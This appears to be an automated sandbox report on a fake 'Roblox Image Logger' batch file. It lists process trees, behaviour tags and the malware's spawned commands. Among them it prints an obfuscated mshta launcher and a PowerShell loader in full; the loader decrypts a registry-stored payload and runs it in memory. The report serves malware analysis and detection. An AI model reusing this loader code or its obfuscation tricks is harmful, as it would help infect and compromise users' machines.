PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 1888	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 1888	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 4556	1968	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1244

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-klxianqkZHcQWHMfaKQz4312:ofEdeBGr=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
2⤵
- Executes dropped EXE
- Modifies registry class
PID:5104

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-klxianqkZHcQWHMfaKQz4312:ofEdeBGr=%
3⤵
- Executes dropped EXE
PID:2940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:yWIkQKjNdX; "
4⤵
PID:4400

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4852

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /C set "EdMWKYgNvJ=[System.Diagnostics.Process]::GetProcessById(4852).WaitForExit();[System.Threading.Thread]::Sleep(5000); function JSGBQ($acZct){ $bfmtR=[System.Security.Cryptography.Aes]::Create(); $bfmtR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $bfmtR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $bfmtR.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('+I6ZmuJ60ylC5oKz6p4Qbu6w9NVMCvQQ1xXCxSqVMhw='); $bfmtR.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('olpcrj1xmwdy0w69EfOMrA=='); $vCXZI=$bfmtR.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $iqnTI=$vCXZI.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($acZct, 0, $acZct.Length); $vCXZI.Dispose(); $bfmtR.Dispose(); $iqnTI;}function smZWp($acZct){ $cYgnp=New-Object System.IO.MemoryStream(,$acZct); $rbNEh=New-Object System.IO.MemoryStream; Invoke-Expression '$xwspY @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$cYgnp,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $xwspY.CopyTo($rbNEh); $xwspY.Dispose(); $cYgnp.Dispose(); $rbNEh.Dispose(); $rbNEh.ToArray();}function dZbtQ($acZct){ $iqnTI = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($acZct); $iqnTI = JSGBQ($iqnTI); $iqnTI = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($iqnTI); return $iqnTI;}function execute_function($acZct,$JnqIB){ $Bkixf = @( '$fhLvv = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$acZct);'.Replace('@', ''), '$qkvfG = $fhLvv.EntryPoint;', '$qkvfG.Invoke($null, $JnqIB);' ); foreach ($HDcUq in $Bkixf) { Invoke-Expression $HDcUq };}$gSgSN = dZbtQ('lXQSPGhYfFxFMeefiw8nqw==');$uEgEn = dZbtQ('56XKKHstDJX94GTiPmLG3COni3Yg1BAZkV0/4kMvogM=');$JDGGM = dZbtQ('WMYsNnWk6rJnXLypWfC9uA==');$aLXoP = dZbtQ('Z72qnNK0NdFzkeoFj2DdZg==');if (@(get-process -ea silentlycontinue $aLXoP).count -gt 1) {exit};$fTAIO = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($gSgSN).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($uEgEn);$eeoNB=smZWp (JSGBQ ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($fTAIO)));execute_function $eeoNB (,[string[]] ($JDGGM));" & echo Invoke-Expression $env:EdMWKYgNvJ; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
5⤵
- Executes dropped EXE
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:EdMWKYgNvJ; "
6⤵
PID:1648

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2004

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2496

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2668

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2536

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Gismo0666/Roblox-Image-Logger/releases/tag/Roblox-Image-Logger
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8b4ce3cb8,0x7ff8b4ce3cc8,0x7ff8b4ce3cd8
3⤵
PID:5012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
3⤵
PID:2632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
3⤵
PID:4556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
3⤵
PID:4716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
3⤵
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
3⤵
PID:2940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
3⤵
PID:2164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
3⤵
PID:2776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
3⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
3⤵
PID:3044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,18127960908054739822,4220385106546317670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
3⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger.bat" "
2⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:wOTwUXbPCP; "
3⤵
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x11c,0x7ff88969ab58,0x7ff88969ab68,0x7ff88969ab78
3⤵
PID:5960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1568 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:2
3⤵
PID:6140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:1516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1744 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:4452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:1
3⤵
PID:5144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:1
3⤵
PID:5152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4284 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:1
3⤵
PID:5472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:5556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:5572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:5828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:5868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:8
3⤵
PID:5924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4964 --field-trial-handle=1836,i,13791061122799613453,192752217249264050,131072 /prefetch:1
3⤵
PID:1692

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger.bat
2⤵
PID:4956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3992

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4348

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
